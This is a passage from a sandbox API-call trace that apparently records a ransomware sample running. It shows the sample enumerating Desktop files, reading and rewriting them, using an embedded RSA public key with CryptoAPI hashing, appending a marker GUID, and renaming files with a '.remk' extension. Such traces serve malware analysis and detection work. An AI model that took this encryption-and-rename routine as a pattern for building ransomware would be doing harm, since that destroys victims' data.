dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.321] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.321] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.321] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.322] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eddd0 | out: hHeap=0x630000) returned 1 [0231.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edde8 | out: hHeap=0x630000) returned 1 [0231.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede30 | out: hHeap=0x630000) returned 1 [0231.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0231.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede30 [0231.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0231.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edde8 [0231.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0231.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31eddd0 [0231.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0231.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0231.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0231.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0231.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0231.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0231.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edde8 | out: hHeap=0x630000) returned 1 [0231.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eddd0 | out: hHeap=0x630000) returned 1 [0231.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0231.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede30 | out: hHeap=0x630000) returned 1 [0231.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0231.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0231.323] GetCurrentThreadId () returned 0x314 [0231.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0231.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x697528 [0231.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0231.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0231.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0231.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0231.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.323] GetCurrentThreadId () returned 0x314 [0231.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0231.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0231.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede30 [0231.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eddd0 [0231.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0231.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0231.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edde8 [0231.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0231.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0231.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0231.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eddb8 [0231.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0231.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede48 [0231.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0231.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0231.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede18 [0231.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede00 [0231.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0231.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ede60 [0231.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede00 | out: hHeap=0x630000) returned 1 [0231.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ede00 [0231.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede18 | out: hHeap=0x630000) returned 1 [0231.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0231.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0231.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0231.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0231.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eddd0 | out: hHeap=0x630000) returned 1 [0231.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eddd0 [0231.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0231.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede30 | out: hHeap=0x630000) returned 1 [0231.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0231.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede60 | out: hHeap=0x630000) returned 1 [0231.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325d6d0 [0231.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0231.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x31b6580 [0231.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0231.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0231.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eddd0 | out: hHeap=0x630000) returned 1 [0231.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d8e8 [0231.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0231.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0231.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0231.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0231.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0231.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8e8 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede00 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede48 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edde8 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eddb8 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edda0 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c13b0 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.328] WriteFile (in: hFile=0x640, lpBuffer=0x37c2278*, nNumberOfBytesToWrite=0x140dd, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c2278*, lpNumberOfBytesWritten=0x3adfb14*=0x140dd, lpOverlapped=0x0) returned 1 [0231.328] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2278 | out: hHeap=0x630000) returned 1 [0231.328] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x140e2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.328] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.328] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0231.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0231.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0231.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0231.328] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0231.329] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0231.329] WriteFile (in: hFile=0x640, lpBuffer=0x325d6d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x325d6d0*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0231.329] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.329] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.329] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.329] CloseHandle (hObject=0x640) returned 1 [0231.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0231.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3dd8 | out: hHeap=0x630000) returned 1 [0231.334] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hl4GPoq4aN.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hl4gpoq4an.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hl4GPoq4aN.flv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hl4gpoq4an.flv.remk")) returned 1 [0231.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0231.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.336] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0231.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693330 | out: hHeap=0x630000) returned 1 [0231.338] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1df5cc0, ftCreationTime.dwHighDateTime=0x1d5de8d, ftLastAccessTime.dwLowDateTime=0xcc5668a0, ftLastAccessTime.dwHighDateTime=0x1d5e2c4, ftLastWriteTime.dwLowDateTime=0xcc5668a0, ftLastWriteTime.dwHighDateTime=0x1d5e2c4, nFileSizeHigh=0x0, nFileSizeLow=0x185e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="irDzr_W5E9Ov4Y9L.mp3", cAlternateFileName="IRDZR_~1.MP3")) returned 1 [0231.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.338] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.338] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0231.338] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\irDzr_W5E9Ov4Y9L.mp3") returned=".mp3" [0231.338] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\irDzr_W5E9Ov4Y9L.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\irdzr_w5e9ov4y9l.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.338] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=99809) returned 1 [0231.338] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.341] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x185bb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.341] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.343] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.343] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x185e1, lpOverlapped=0x0) returned 1 [0231.345] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.345] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.345] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.345] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0231.346] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.346] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.346] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.346] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.346] GetLastError () returned 0x0 [0231.346] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.346] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0231.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.346] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.346] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.346] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 